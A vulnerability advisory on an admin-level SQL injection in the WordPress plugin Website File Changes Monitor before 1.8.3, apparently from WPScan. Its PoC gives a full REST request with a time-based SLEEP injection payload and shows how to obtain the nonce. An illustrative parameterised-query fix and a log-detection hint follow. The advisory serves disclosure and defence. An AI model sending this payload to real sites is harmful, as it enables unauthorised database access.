wpvulndb
WPVDB-ID: BB348C92-D7E3-4A75-98AA-DD1C463BFD65
History: Jul 18, 2022 - 12:00 a.m.

Website File Changes Monitor < 1.8.3 - Admin+ SQLi

2022-07-18 00:00:00
Nicolas VIDAL from TEHTRIS
wpscan.com
website file changes
sql injection
admin+ permission

EPSS: 0.002
Percentile: 54.5%

The plugin does not sanitise and escape user input before using it in a SQL statement via an action available to users with the manage_options capability (by default, administrators), leading to an SQL injection.

PoC

A user with manage_options permission can exploit the vulnerability with the following request:

DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1
Host: 127.0.0.1
X-WP-Nonce: 5732d8605b
Cookie: [redacted]
Content-Type: application/json
Content-Length: 54

{"path":"a'-(SELECT 1 FROM (SELECT(SLEEP(5)))SQLi)-'"}

The nonce required for the "X-WP-Nonce" header can be found in the source code of the page /wp-admin/admin.php?page=wfcm-file-changes, at the following line:

var wfcmData = {"restNonce":"5732d8605b","restAdminEndpoint":"http://127.0.0.1/wp-json/website-file-changes-monitor/v1/admin-notices","adminAjax":"http://127.0.0.1/wp-admin/admin-ajax.php"};
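The class of bug described above (a REST action that concatenates a user-supplied "path" into SQL) is fixed by parameterising the query rather than by relying on the manage_options check alone. The following is an added illustration written for this entry, not the plugin's own code: the route namespace, the table name `example_file_events`, the column names and the helper function names are all placeholders chosen for the example.

```php
<?php
// Hypothetical hardened REST handler (added example, not the plugin's code).
// Assumes a custom table $wpdb->prefix . 'example_file_events' with columns
// `path` and `is_read`; route, table and column names are placeholders.

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-monitor/v1', '/mark-read-dir', array(
        'methods'             => 'DELETE',
        // The capability check keeps the action admin-only, as in the advisory,
        // but a capability check is not a substitute for escaping: the SQL
        // below must be safe even when the caller is a legitimate admin.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args' => array(
            'path' => array(
                'required'          => true,
                'type'              => 'string',
                'sanitize_callback' => 'sanitize_text_field',
                // Only accept an existing directory under the site root.
                'validate_callback' => 'example_validate_monitored_path',
            ),
        ),
        'callback' => 'example_mark_dir_read',
    ) );
} );

// Placeholder validator: resolves the requested path and rejects anything
// that does not resolve to a location inside ABSPATH.
function example_validate_monitored_path( $value ) {
    $root = realpath( ABSPATH );
    $real = realpath( ABSPATH . ltrim( $value, '/' ) );
    return $root !== false && $real !== false && strpos( $real, $root ) === 0;
}

function example_mark_dir_read( WP_REST_Request $request ) {
    global $wpdb;
    $table = $wpdb->prefix . 'example_file_events'; // placeholder table name
    $path  = $request->get_param( 'path' );

    // Vulnerable pattern the advisory describes (kept as a comment for contrast):
    // $wpdb->query( "UPDATE $table SET is_read = 1 WHERE path LIKE '" . $path . "%'" );

    // Fixed: the value goes through $wpdb->prepare() as a %s placeholder, and
    // esc_like() escapes % and _ so user input cannot widen the LIKE pattern.
    $like = $wpdb->esc_like( $path ) . '%';
    $rows = $wpdb->query(
        $wpdb->prepare( "UPDATE {$table} SET is_read = 1 WHERE path LIKE %s", $like )
    );

    if ( false === $rows ) {
        return new WP_Error( 'db_error', 'Update failed', array( 'status' => 500 ) );
    }
    return rest_ensure_response( array( 'updated' => (int) $rows ) );
}
```

Two details matter for this fix. First, `$wpdb->prepare()` cannot parameterise identifiers, so the table name is interpolated only because it is built from the trusted `$wpdb->prefix` and a constant, never from request data. Second, on a site that still runs an affected version, a request to `/wp-json/website-file-changes-monitor/v1/mark-read-dir` whose JSON body contains SQL keywords or `SLEEP(` in the `path` field (as in the PoC above) is the pattern to look for in web-server and REST access logs when checking whether the issue was exercised.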

